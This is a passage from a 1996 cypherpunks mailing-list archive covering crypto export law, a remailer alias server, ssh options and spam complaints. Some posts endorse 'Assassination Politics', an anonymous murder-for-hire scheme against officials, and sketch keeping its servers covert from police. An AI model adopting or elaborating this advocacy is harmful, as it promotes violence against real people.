be present, under the CDA, and before it was put on > semi-hold), his colleagues would just have snickered, thinking him crazy. There was once a day where confessing to sexual harassment or smoking something fishy would have caused this response. Today it is grounds for immediate dismissal. > As to the felony status of taking PGP to Russia, I think it's not a felony. > The "personal use" exemption in the ITARs certainly makes taking PGP to > _Western_ Europe an OK thing. Whether Russia is still considered to be > worthy of an "exemption to the exemption," as it were, is unclear to me. Unfortunately these kind of exceptions are easily evaded when push comes to shove. > Mostly, I think U.S. Customs doesn't care. If this is true, it is for two reasons. 1> Because no one has yet told them to care. 2> Because they find the regulation to difficult to enforce. Start admitting that you have engaged in the conduct and those two factors may quickly vanish. Am I being cautious? Of course. Once upon a time it was ok to admit that you left the country with tens of thousands in cash too. > --Tim May > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From jimbell at pacifier.com Thu Sep 26 13:50:05 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 27 Sep 1996 04:50:05 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <199609261713.KAA02040@mail.pacifier.com> At 10:49 AM 9/26/96 -0400, Brian Davis wrote: >On Wed, 25 Sep 1996, Jean-Francois Avon wrote: > >> On 25 Sep 96 at 5:59, Brian Davis wrote: >> >> > I disagree that that will be the response, but you should be willing >> > to allow one group of people to fight fire with fire. >> >> But generally, it has been found a much better solution to fight fire >> with water, and this is why I am not convinced of the ideological >> effectiveness of AP, although I don't doubt it's operationnal >> effectiveness at all. > > >If by "operation effectiveness" you mean some people will be killed, I >agree. I also agree with the fire/water comment (maybe in more ways than >one!); my comment related to my belief that AP-supporters shouldn't >complain about especially draconian measures taken against them by >governments, given their modus operandi. I think you totally missed Jean-Francois' point: Turn your last statement around, and that's how _I_ look at the operation of governments: "Government supporters shouldn't complain about especially draconian measures taken against them by AP, given their modus operandi." I for one would welcome a debate on just such an issue. Remember, to justify the status quo you need to defend not only the comparatively-free governments of a handful of western nations, but in fact each and every government on the face of the earth. Don't think you can just say, "This government is sorta okay," because what I am proposing fixes all the other governments on earth. You can't support the maintenance of an oppressive system most everywhere else, simply because (arguendo) they "sorta" got it right, here. (And I'd argue against that last claim!) Besides, I've long ago given up the idea that the leadership of the US will really, truly attempt to promote freedom around the world. No, they won't. They will continue to support the thugs. The problem they have with overthrowing the thugs is that "what goes around comes around," and they're well aware that they're gonna get kicked off their throne once the precedent is set with a few dozen foreign governments getting replaced. Jim Bell jimbell at pacifier.com From jf_avon at citenet.net Thu Sep 26 13:51:58 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Fri, 27 Sep 1996 04:51:58 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <9609261727.AA03280@cti02.citenet.net> On 26 Sep 96 at 10:49, Brian Davis wrote: > If by "operation effectiveness" you mean some people will be killed, > I agree. I also agree with the fire/water comment (maybe in more > ways than one!); my comment related to my belief that AP-supporters > shouldn't complain about especially draconian measures taken against > them by governments, given their modus operandi. I don't think that any of them will complain because they understand the nature of it. I think that Jim Bell (forgive me Jim...:) view that there will be only limited retaliation from government is not guaranteed at all. As I said somewhere previously, the whole thing will depend on how the authorities view AP as (non-) attackable. Here is the post I wrote earlier: ------- earlier post ------- jim bell recently wrote: > Local police action against an AP organization would, of course, be > deterred by the prospect of naming anybody who would go after it, > and soliciting donations against them. I don't agree here. It would all be a matter of timing, unless the number of AP servers would be sprouting out faster than police forces would be able to destroy them. You have to realize that if the money is seized, noboby will be willing to make a hit since the odds of being paid are not too good. Just play the game "Command and Conquer" for a while and you'll see. Money is fuel. Don't run off of it! For that reason, I think that any AP server, *at the introduction of the concept* would have to be a covert operation. Servers could come out in public light when their number be large enough to warrant a strike on anybody trying to eliminate them. Same for the publication of the name of the individuals operating the server. To me, this seems obvious. Comments? To go on along that line, I had the idea that a specific piece of software, a bit like Private Idaho, that would chain remailers but that would be specifically designed to handle predictions, would have be designed. (Pardon my ignorance of the net here) The server need not to be a unique address. Actually, the prediction and any accompanying documents could be splitted a la Secure Split, and sent to N differents servers, M ( --- begin forwarded text MIME-Version: 1.0 Date: Thu, 26 Sep 1996 00:13:30 -0400 Reply-To: Law & Policy of Computer Communications Sender: Law & Policy of Computer Communications From: Alan Lewine Organization: Representing Myself Subject: Call for Papers: The Economics of Digital Information and Intellectual Property To: CYBERIA-L at LISTSERV.AOL.COM John F. Kennedy School of Government Center for Science and International Affairs and Center for Business and Government Harvard Law School Institute for Information Technology Law and Policy Harvard University Library Council on Library Resources Coalition for Networked Information The Economics of Digital Information and Intellectual Property Cambridge, Massachusetts, USA January 23-25, 1997 First Announcement and Call for Papers Harvard University is hosting this symposium to broaden and deepen understanding of emerging economic and business models for global publishing and information access and the attendant transformation of international information markets, institutions, and businesses. The goal is to provide managers in public, private, and nonprofit sectors with a practical framework for developing program strategies and assessing the efficiency and competitiveness of new information markets and institutions. It will address questions such as: --What will be the principal pricing models for information in an advanced global Internet? -- How will pricing models be affected by different technological factors and market environments? -- What will be the relationships between classic production costs, transaction costs, and the economic value of intellectual property? -- How will different pricing practices at lower layers affect the pricing of information? -- What are likely long-term trends and scenarios for different pricing models? What will be the effect of bundling or unbundling of information services? -- How will changing cost structures change the allocation of rights between authors and publishers and other intermediaries? -- How will markets for complementary products and services affect the pricing and use of information? -- What are the policy implications of different pricing models? -- How do these reflect policy values associated with different kinds of information? Background: The rapid growth of the Internet and the World Wide Web is trans- forming the way information is accessed and used in business, education, and the home. New models for distributing, sharing, linking, and enhancing information are appearing, often embodied in software or infrastructure. No change is more dramatic than the shift to user-initiated retrieval for text-based information formerly distributed in the form of physical objects by publisher-initiated manufacturing and delivery. A similar shift may be underway for sound and video. However, the considerable differences in bandwidth and storage requirements between text, images, sound, and video may dictate different cost and pricing models in the near and mid-term. As production and distribution costs decline, transaction costs and the value of intellectual property may assume greater prominence. On the other hand, standards and software may work to substantially reduce transaction costs over the long run. With barriers to entry reduced by technology, information markets may become extremely competitive, reducing margins and possibly lowering the economic value of many forms of intellectual property. The Internet and the World Wide Web are characterized by explosion of information along with an explosion of new tools for navigating information. Competition for attention intensifies as companies extend their marketing, sales, and support functions into the Internet. Useful or entertaining information may have greater value in attracting customer attention in an increasingly competitive marketplace for information. Accordingly, it has been argued that information will be valued less as intellectual property and more in terms of the access it provides to other markets and the value it adds to relationships. As a practical matter, copyright may be overshadowed by the growing use of contracts as a means of both securing value and defining expectations in continuing relationships. Positions in simple distribution chains are likely to erode as a result of disintermediation and intense competition. In particular, reduced production costs and the desire to avoid residual transaction costs may force vendors away from complex pricing models. For example, usage-based pricing may give way to subscription pricing. Such dynamics may lead to new institutional arrangements for managing life-cycle costs of information, especially in small markets where users are also producers. Similarly, as production costs decrease, the costs of information may be assimilated by the underlying infrastructure or assumed by users. This trend may be seen in the pricing of online services and in the massive volunteering of content on the World Wide Web. The Web, including software and servers, enables editorial and navigation functions traditionally performed by publishers and libraries to be performed in increased measure by individual authors and end users. Cost analysis in this environment may hinge on identification and evaluation of critical bottlenecks -- with the understanding that many technological limitations may be short-lived. Congestion may lead to new methods of supplementing point-to-point transmissions, such as caching, mirroring, and satellite broadcast. These new mechanisms may raise intellectual property and interconnection questions that may be addressed both as business and policy issues. Congestion may also hasten the implementation of type of service priority at either the network or server levels. Negotiation over quality and scope of service may become extremely complex, and vendors may be tempted to price to as many dimensions of value as possible. However, simple pricing models may have surprisingly strong appeal, as they have had in the analog environment. Sequential distribution windows for motion pictures illustrate the potential for simple price differentiation in a technologically complex environment. Price differentiation is now playing an increasingly important role in the marketing of software and databases. In fact, there may be public policy arguments for price differentiation, not only for reasons of efficiency but to enable some of level of access for those who cannot afford access under standard terms, just as public libraries have offered access for those who could not afford to buy. ***** The Information Infrastructure Project emphasizes communication and sharing of insight among scholars and practitioners with different skills and backgrounds. Papers should be written in a clear, non-technical manner (technical appendices may be permitted) for a mixed, interdisciplinary audience that will include publishers, librarians, economists, lawyers, and policy- makers. Prospective authors should submit short abstracts for review and comment as soon as possible. Extended abstracts or outlines should be submitted by October 15, 1996, to ensure consideration for the program. Acceptances of abstracts and outlines are conditional pending receipt of a satisfactory draft by December 15, 1996. Papers and supplementary material will be published as a volume in the Project's series with the MIT Press. Copyright assignment is not required, and parallel publication of individual papers in journals is encouraged. Please send paper proposals and requests for subsequent announcements to: iip at harvard.edu Or send mail to: Tim Leshan Information Infrastructure Project John F. Kennedy School of Government 79 John F. Kennedy St. Cambridge, MA 02138 617-496-1389 Fax: 617-495-5776 leshan at ksgrsch.harvard.edu -- Alan Lewine http://www.dcez.com/~alewine/ "[I]n sex as in other areas of life, beware governmental regulation." --Richard Posner, "Sex and Reason" (1992) --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From stewarts at ix.netcom.com Thu Sep 26 15:41:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 27 Sep 1996 06:41:26 +0800 Subject: LACC: Encryption and Japan Message-ID: <199609261922.MAA10619@dfw-ix1.ix.netcom.com> At 06:46 AM 9/25/96 +0100, T Bruce Tober wrote: >A few months ago I read an article concerning one of the encryption >gurus (other than PZ) setting up a company in Japan to create a new >encryption program as good as or better than PGP which since it was >developed in Japan, wouldn't be subject to ITAR. Jim Bidzos of RSA did a contractual deal with NTT, who have produced a chip with RSA and Triple-DES implemented on it. I'm not sure the details of the deal, but essentially it's a license to use the patented RSA technology. It's not that it's better or worse than PGP; it's hardware implementations of some of the building blocks PGP uses. The real win of PGP was taking the pieces (RSA public key key-distribution and signatures, hashing, and symmetric crypto (DES,Bass-O-Matic,IDEA)), putting them together into one relatively usable package, and distributing it. The Web Of Trust that you build out of the RSA signatures is also a win, since it lets you build non-hierarchical key distribution, which is especially valuable for non-government-approved lefties :-) as well as letting you build hierarchical military-style approval if you want. But that's all applications of the core technologies - NTT is providing the core pieces that you can build that sort of thing out of. The NTT deal means that non-US manufacturers can build crypto-phones, crypto-faxes, crypto-wide-area-network-muxes, etc., without annoying US local ordinances interfering. If they use it widely, and a flood of such products hit the US, ITAR becomes effectively dead, which may help it become really dead. And if they don't, you can at least get somebody in Japan to build a crypto-virtual-private-WAN router so your company's internal international email and phone network will be untappable. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From webwarrior at infowar.com Thu Sep 26 15:59:36 1996 From: webwarrior at infowar.com (webwarrior at infowar.com) Date: Fri, 27 Sep 1996 06:59:36 +0800 Subject: Apology Message-ID: <14383601200780@infowar.com> OOPS! OUCH!!! CRASH!!! Yesterday our ListServ underwent emergency surgery and our Web Warriors say all vital signs are stabilized. A complete recovery is assured! We apologize for the inconvenience. Thank you for your understanding. Winn Schwartau and the folks at Infowar.Com Betty G.O'Hearn Information Warfare and InfoSecurity Assistant to Mr. Winn Schwartau http://www.infowar.com betty at infowar.com 280 126th Ave. E.#110 Treasure Island, FL 33706 813-367-7277 Voice 813-363-7277 FAX From deviant at pooh-corner.com Thu Sep 26 16:01:34 1996 From: deviant at pooh-corner.com (The Deviant) Date: Fri, 27 Sep 1996 07:01:34 +0800 Subject: An idle thought on CBC and block lengths In-Reply-To: <960925181213_529562658@emout15.mail.aol.com> Message-ID: On Wed, 25 Sep 1996 PhneCards at aol.com wrote: > Date: Wed, 25 Sep 1996 18:12:14 -0400 > From: PhneCards at aol.com > To: osborne at gateway.grumman.com, cypherpunks at toad.com > Subject: Re: An idle thought on CBC and block lengths > > Did you know this company is using your email address as part of > an unlawful email bomb? > > I would advise you to write to them at cypherpunks at toad.com > and owner-cypherpunks at toad.com and advise them to stop > using your email address for this type of activity. > > It is illegal to use a invalid return email address. If this continues, I > will > be forced to prosecute the return email address - which they are > making to look like you. Is it? I beleive that if you look closely, you will discover hat all the laws which would have made lying illegal on the 'Net have now been repealed by more Federal judges than I can count on 1 hand... > > Below is the letter that I received in my email box > ================================================= > > In a message dated 96-09-25 15:52:17 EDT, you write: > > >Subj: An idle thought on CBC and block lengths > >Date: 96-09-25 15:52:17 EDT > >From: osborne at gateway.grumman.com (Rick Osborne) > >Sender: owner-cypherpunks at toad.com > >To: cypherpunks at toad.com > > > >So I was sitting bored at home and thinking to myself: CBC is cool. > >Without the key, you're screwed because a single bit error propagates > >throughout the entire message. But then I was thinking, yeah, but you can > >still eventually get the ONE key. So I began to wonder what the difference > >in security is between encrypting an entire M with just one K in CBC, or > >encrypting M with permutations of K over specific block lengths. > > > >On the one hand you've got just one key, which makes it that much harder to > >find in the keyspace. On the other hand, If evil interloper Eve gets her > >hands it, she has to find all of the keys to get all of M. (Assuming she > >is using brute force and can't necessarily find the master K to permute > >into the subkeys.) > > > >The downsides are of course that on the one side you've got just one key, > >and once you get it, you get M. But on the other hand, you can get any one > >part of the message with less difficulty because of the higher number of > >keys. And, of course, if your master K is easy to brute force, then it's > >actually worse than the first option. > > > >Does anyone have opinions / knowledge of which is better? > > > > > >____________________________________________________________ > >Rick Osborne osborne at gateway.grumman.com > >"The universe doesn't give you any points for doing things that are easy." > > > > > > > >----------------------- Headers -------------------------------- > >From cypherpunks-errors at toad.com Wed Sep 25 15:51:46 1996 > >Return-Path: cypherpunks-errors at toad.com > >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by > >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA04207 for > >; Wed, 25 Sep 1996 15:51:43 -0400 > >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > > id AA27411; Wed, 25 Sep 1996 13:47:22 -0600 > >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA16059 > for > >cypherpunks-outgoing; Wed, 25 Sep 1996 05:57:39 -0700 (PDT) > >Received: from gateway.grumman.com (gateway.grumman.com [192.86.71.8]) by > >toad.com (8.7.5/8.7.3) with SMTP id FAA16054 for ; > Wed, > >25 Sep 1996 05:57:32 -0700 (PDT) > >Message-Id: <3.0b19.32.19960925085644.0068cb90 at gateway.grumman.com> > >X-Sender: osborne at gateway.grumman.com > >X-Mailer: Windows Eudora Pro Version 3.0b19 (32) > >Date: Wed, 25 Sep 1996 08:56:45 -0400 > >To: cypherpunks at toad.com > >From: Rick Osborne > >Subject: An idle thought on CBC and block lengths > >Mime-Version: 1.0 > >Content-Type: text/plain; charset="us-ascii" > >Sender: owner-cypherpunks at toad.com > >Precedence: bulk > > > --Deviant A casual stroll through a lunatic asylum shows that faith does not prove anything. -- Friedrich Nietzsche From iang at cs.berkeley.edu Thu Sep 26 16:05:07 1996 From: iang at cs.berkeley.edu (Ian Goldberg) Date: Fri, 27 Sep 1996 07:05:07 +0800 Subject: Where to write crypto? In-Reply-To: Message-ID: <52env6$5ij@abraham.cs.berkeley.edu> -----BEGIN PGP SIGNED MESSAGE----- In article , Timothy C. May wrote: >At 2:05 PM 9/25/96, s1113645 at tesla.cc.uottawa.ca wrote: > >>Why go so far, when you can export crypto from Anguila or Canada. The > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >Are you _sure_ about what you say about Canada? After all, in nearly all >defense- and crypto-related matters, they are essentially the 51st State. >In fact, Canada is one of the places crypto may be exported _to_ from the >U.S. without any license. So, export strong crypto into Canada and then >invoke the "you can export crypto from...Canada" clause? > >I don't think so. As far as I'm aware, the rule for Canada is this: If it came from the US, it can only be exported back to the US. If it did not come from the US, it can be exported to any "non-evil" country ("evil" countries are ones like Libya). Then there are rules for what "came from" means, which are less clear. I've also heard "substantially modified": if software comes from the US into Canada, and is "substantially modified" in Canada, it may be exported. - Ian "having a vested interest in this topic..." -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMkrjIkZRiTErSPb1AQHQXgP+KbGrV49JAe5VkGu9eSlPmKHJT9dsKTjr bEd+CocV84xvqbRI6VNQkiUMF++aHcIenjzEwMVyln3pDDbbWt6ptFp24DlZhHha 9elzVZ0ecXo2wtqVQer28dL5cok6xSpny2Wz35jxiUe1SNjNBi71jJOvdlOD+aI9 vKcCb2jHECU= =JZ8x -----END PGP SIGNATURE----- From snow at smoke.suba.com Thu Sep 26 16:10:55 1996 From: snow at smoke.suba.com (snow) Date: Fri, 27 Sep 1996 07:10:55 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609221810.TAA00172@server.test.net> Message-ID: <199609261906.OAA00239@smoke.suba.com> Mr. Beck said: > Been reading the AP thread, and thought I'd donate some of my views. > the Internet. You'd just cause the government to panic, and this > would have negative effects, it would take ages for them to calm down, > and the laws they'd pass in the mean time would mean a near certainty > of mandatory GAK as a condition to switching the Internet back on. > (Before someone takes me to task for the impossibility of switching > the Internet off, it all depends on the level of government panic. > More specifically perhaps they would disconnect key backbones, and > ISPs briefly while they rushed into effect a few presidential decrees > outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets, > etc.) This would be cutting their own throats. There is SO much commercial and government traffic going across "The Net" that many businesses would scream bloody murder, and the government would have MASSIVE trouble with it's agenda. > Libertarian governments, if they come, I think will be more easily, > and more likely achieved via non-violent means. I think it will be a > much more gradual process, and that government power will just be > gradually eroded as international businesses gain power, and borders > become more open, trade more free, as travel becomes cheaper, and > moving to another country becomes less of a hassle. Telecommuting, A very nice pipe dream. You sir have entirely too much faith in humanity. > Governments are currently flailing around trying to prolong the > inevitable. The fall out from this is beginning to annoy some people. > If it annoys enough people soon enough that they vote in a Libertarian > candidate for president in the next 20 years, crypto anarchy, and > libertarian governments could be reached more quickly. I'm not sure > it will ever get that far though, because the more votes the > libertarians get over the following years, the closer we get to > libertarian anyway, because the government has to start adopting their > policies to get the votes back. (Much like the green movement, which > once it started getting significant votes, and media attention, was > pandered to by politicians of all parties. They're all green now:-) They are TALKING green, but their actions aren't. This shows that the "libertarianization" of the ruling party would be in talk only. Unfortunately people vote THEIR pockets, regardless of why their pockets are the way they are. They vote their fears as well. They will almost always vote for politicos who claim "anti-crime" (more like "more-prisons") and "anti-drug" (read "more inner city youth inprisoned"), and soon "anti-crypto" (which will be based on 4-horsemen hysteria). People, being for the most part stupid and short sighted, will vote away thier rights, just as they have done for the last 200 years. No, I am not the LEAST BIT fatalist about this. I am trying to fight it with the limited resources I have, but... Petro, Christopher C. petro at suba.com snow at smoke.suba.com From comments at tv1.com Thu Sep 26 16:27:30 1996 From: comments at tv1.com (TV1) Date: Fri, 27 Sep 1996 07:27:30 +0800 Subject: A Special Invitation to TV1 Users: Message-ID: <199609262026.QAA14139@spirit.hks.net> -----BEGIN PGP SIGNED MESSAGE----- The best things in life are still free-and some of them get even better! Once upon a time, you registered to use TV1, the only personalizable TV listings site on the Internet. If you've been back to the site during the past week, you would have noticed gargantuan, earth-shattering additions to our humble old listings Web site. TV1 has been incorporated into The GIST, a full service home entertainment guide providing in-depth coverage of what's worth watching on TV and the Internet, as well as original features on everything from today's hottest television shows (with audio clips of stars) to reviews of the latest home entertainment hardware. If you've been to TV1/TheGIST lately, we hope you've been enjoying our service, and hope that you don't mind the fact that our graphic improvements now require at least a Netscape 2.0 or Explorer 3.0 browser. Stick with us, and you'll be seeing even more great enhancements during the next month. If you're one of those deprived Web surfers who hasn't seen the site in a few weeks, c'mon back--and see what you've been missing. Our new URL is www.theGist.com or you can still reach us at www.TV1.com. Thanks. We look forward to helping you with your home entertainment choices tonight, and every night. Your wannabee hosts, - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMkrm7SoZzwIn1bdtAQGILAF8DsqSWOeABIYPgOcXwyk6FLores03wa15 LGDwf//VqW+dwIj4XyNvPqGD/CpdE27L =2Ss2 -----END PGP SIGNATURE----- From jimbell at pacifier.com Thu Sep 26 16:32:11 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 27 Sep 1996 07:32:11 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <199609262012.NAA14242@mail.pacifier.com> At 01:27 PM 9/26/96 -0500, Jean-Francois Avon wrote: >On 26 Sep 96 at 10:49, Brian Davis wrote: > >> If by "operation effectiveness" you mean some people will be killed, >> I agree. I also agree with the fire/water comment (maybe in more >> ways than one!); my comment related to my belief that AP-supporters >> shouldn't complain about especially draconian measures taken against >> them by governments, given their modus operandi. > >I don't think that any of them will complain because they understand >the nature of it. I think that Jim Bell (forgive me Jim...:) view >that there will be only limited retaliation from government is not >guaranteed at all. As I said somewhere previously, the whole thing >will depend on how the authorities view AP as (non-) attackable. > >Here is the post I wrote earlier: > >------- earlier post ------- > >jim bell recently wrote: > >> Local police action against an AP organization would, of course, be >> deterred by the prospect of naming anybody who would go after it, >> and soliciting donations against them. > >I don't agree here. It would all be a matter of timing, unless the >number of AP servers would be sprouting out faster than police forces >would be able to destroy them. You have to realize that if the money >is seized, noboby will be willing to make a hit since the odds of >being paid are not too good. Just play the game "Command and Conquer" >for a while and you'll see. Money is fuel. Don't run off of it! Uh, okay, I didn't mean to suggest that attacks would be entirely eliminated. (The term "deterred" really needed to be quantified there, even for a native English speaker.) But my main point was that (as evidenced by Brian Davis' unwillingness to acknowledge that the people who run the system will engage in illegality to stop AP) there is a certain hesitancy on the part of the "ruling class" to abandon at least the facade of legality that they often promote. > Jim Bell jimbell at pacifier.com From jkroeger at squirrel.owl.de Thu Sep 26 16:45:45 1996 From: jkroeger at squirrel.owl.de (Johannes Kroeger) Date: Fri, 27 Sep 1996 07:45:45 +0800 Subject: New alias server weasel.owl.de Message-ID: <19960926192626.18167.qmail@squirrel.owl.de> -----BEGIN PGP SIGNED MESSAGE----- I'm running the Squirrel Remailer for some weeks now and finally managed to install a "newnym" style alias server (like nym.alias.net) with the hostname weasel.owl.de. Here is the PGP key: Type Bits/KeyID Date User ID pub 2047/B77F2491 1996/09/07 / -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQENAzIxkrUAAAEH/1mg2l5pTFPwdJZp79M3g+aflsoRFd1QIebXktcg2SIcWc+K nBU0kHRPx53A3SHnUjtAj9ZOOL9LbmSaR6uwYw3voPnOF7cXsyMlG0dNjkJMzCZM UAWAaTB5OcUl2oUrbO+Ceasg94LrDjXCqWf6zxRNgb00SOOopKf+NBtm25wwX1wQ LawWkQeLLMhphCLYwbeLqrMexj9eNsKIxmmEHmD5//crkIa8GVlSatdOV3TDxeNv GOflltDnGXdGxkAu9ck7Wa7ixQwrTr5IxF5jaxTquUyz+qqni/y1/F4dr7brk7Fz VWaqBzlA54Q1oHAM9ptyJKgz+vNFPF2asbd/JJEABRG0Kzxjb25maWdAd2Vhc2Vs Lm93bC5kZT4vPHNlbmRAd2Vhc2VsLm93bC5kZT6JARUCBRAyRtqzvA9InihC/mkB ASScB/99663wchJb55cyiGkxzIvxF8HULc+PCUxY7Dd/+RF+N5vJlW9tG1cInF3+ LmMu9iIdEBj7FOnvSh65gGwiIEasVoFLcA4fXzaGC7Nds6OvwzmURbW4GhmDIPTt OPzUYc3vlyF3/iExRVL/aomL4aKMgMnRIagPkj2wT0G4YVuVvb6pAQ9Z/qDjgIok QEN+yy4NOlwCZQJ4V3TJ/35Fq8dKXkA7eyy4eEK97+VzJOK3ApldEqM71LE7jDtk JjbUBmTOfm0NQDbRlEUnfoSyF9yt/MCE7ranSQ2z0hRrw+z6i4XsxAQljPyE1CLD YX3nIIUhXumsBwSMPPZ7nfiuNFcaiQEVAgUQMkZ6FzxdmrG3fySRAQF0CAf8CMle kOnkwvriif+PdlKnf8rjRtL2H5fk3wg7LmdvpkRzGvJaEtGnToRALEWPujAEY9wg YUnDpMiLWkPEVN1cQz690bvzQdyGVb0x4gDsFbivUIuHA55k9c+9cV08tp+4VqB3 0IQ92p16HfCcLz7Ac+oYPXbLpOceG51mEZLCzu9xeEpk6CbsfQ+GMXXcahqRvJ7Y X1dwCwzHG+toPhC9a3+uLggeh72HJW2dI4ExIHYaKhIK5lO874B6G5XEWpdjnqUl MXIyoaEtYhUaoeEdBE49jKnyTtuQ8DDy+6xOrOE3F3Sc++8F2zNrY/ZJsLsUb5RG EI5u/40s+ASl56KVVw== =Ld7v -----END PGP PUBLIC KEY BLOCK----- The following lines should be added to Raph's remailer list: $remailer{'weasel'} = ' newnym pgp'; (weasel squirrel) Weasel.owl.de has MX records, but no IP address. You can finger addresses at squirrel.owl.de when it is connected to the Internet. My connection for email is via a UUCP link that is polled every 90 minutes, so do not expect quick turnaround of remailed messages. Please read the help file before using the remailer. You can get it by sending mail to . Reports of problems, bugs, abuse etc. should be sent to . C'punks, please mail questions and comments directly to me, as I'm not subscribed to the cypherpunks list. - -- Johannes Kroeger Send me mail with subject "send pgp-key" to get my PGP key -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: latin1 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQEVAgUBMkrY3bwPSJ4oQv5pAQGx1ggAxdcMtxQt1K45bijxqPxMQ+ajlIy3TeRB Y5bxSyr1Q0cTMbKx4ausilrzmaPNLpRU8drMuSk7dbRW4ca9Qs/5kiWhtvIluv70 ex2CgcSjJRLtbq3fEPxcRdOGVU0cxYusS9XP5QJSUJv+nHo5k3qWr7L3Ayk8kKhh lU4NJ535u+WX4v+/70d6Xk/9NF7JtN9sSfxjK7bY9vszMFtihXRCQ8fFoDKzjy84 Mgl1zOfeAJv7snhWt2k/CBsKRlFNsMCLSBDg9ADOqs9O+40KoY2+lpewRXvFLp4y VQv4f7wCcbxtnqTgFPeezEWIfO7xBbkhIUIOyETDzo8JeR7EZzEVYw== =N3Y/ -----END PGP SIGNATURE----- From Lsurfer at cris.com Thu Sep 26 16:48:19 1996 From: Lsurfer at cris.com (Randy Bradakis) Date: Fri, 27 Sep 1996 07:48:19 +0800 Subject: Stop Spammers Today! In-Reply-To: <960925085324_292805914@emout19.mail.aol.com> Message-ID: The former human known as "PhneCards at aol.com" wrote: {Dear cypherpunks; Hey, it knows who we are! {In the last few days I have received numerous email coming from you but with {fake return addresses from messages posted on newsgroups. I must have been {targeted because I am a bulk emailer. Letting you know now that I am a {legitimate bulk emailer compiling my list with the permission of each account {holder. Er, does it mean that someone subscribed it to the list? {If this barrage of email does not cease immediately, I will be forced to take {legal and maybe not so legal actions to defend myself. This from a 'bulk emailer'? 'scure me while I snort. :snort: Against whom, exactly, would you take legal action against? Hey, PhneCards, perhaps someone that was on your email list that wasn't exactly pleased with your assumptions of 'permission' subscribed you? Don't get any ideas about it having been me, or even someone actually on the list, as we see enough of this garbage as it is, and would have most probably subscribed you to a coredump or clueless list. {If you would like to discuss this further, please call me at 407-438-8892. How about 'unsubscribe cypherpunks' in the message body of an email to majordomo at toad.com, instead? -- no sig too small From stewarts at ix.netcom.com Thu Sep 26 17:33:16 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 27 Sep 1996 08:33:16 +0800 Subject: Medical Data Message-ID: <199609262144.OAA19955@dfw-ix1.ix.netcom.com> At 09:28 AM 9/25/96 -0500, Phil Fraering wrote: >Of course, one area where the doctor will continue to hold a patient's >records, instead of the patient, due to the nature of the current system: > >Prescription medication. >Of course, with the really big problems with this stuff, drug >interactions, there's still no system for a doctor to find out what you're >on thanks to another doctor. Which is why it's very important to always >use the same pharmacist. Pharmacists in the US use a nationwide system that keeps track of who's using what. Issues in a system like this include insurance-paid pharmaceutical plans and also tracking politically-questionable pharmaceutical purchasers. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From unicorn at schloss.li Thu Sep 26 17:37:02 1996 From: unicorn at schloss.li (Black Unicorn) Date: Fri, 27 Sep 1996 08:37:02 +0800 Subject: ssh - How widely used? Message-ID: Does anyone know if there are MS-Dos or Mac versions of the ssh client? How much is ssh used? I've not seen much discussion of it but poking around an ISP yielded this: Ssh (Secure Shell) a program for logging into a remote machine and for executing commands in a remote machine. It is intended to replace rlogin and rsh, and provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbi- trary TCP/IP ports can also be forwarded over the secure channel. and Usage: ssh [options] host [command] Options: -l user Log in using this user name. -n Redirect input from /dev/null. -a Disable authentication agent forwarding. -x Disable X11 connection forwarding. -i file Identity for RSA authentication (default: ~/.ssh/identity). -t Tty; allocate a tty even if command is given. -v Verbose; display verbose debugging messages. -q Quiet; don't display any warning messages. -f Fork into background after authentication. -e char Set escape character; ``none'' = disable (default: ~). -c cipher Select encryption algorithm: ``idea'' (default, secure), ``des'', ``3des'', ``tss'', ``arcfour'' (fast, suitable for bulk transfers), ``none'' (no encryption - for debugging only). -p port Connect to this port. Server must be on the same port. -L listen-port:host:port Forward local port to remote address -R listen-port:host:port Forward remote port to local address These cause ssh to listen for connections on a port, and forward them to the other side by connecting to host:port. -C Enable compression. -o 'option' Process the option as if it was read from a configuration file. Looks like a nice little implementation. Comments anyone? -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From tcmay at got.net Thu Sep 26 17:39:05 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 27 Sep 1996 08:39:05 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: At 1:37 PM -0400 9/26/96, Black Unicorn 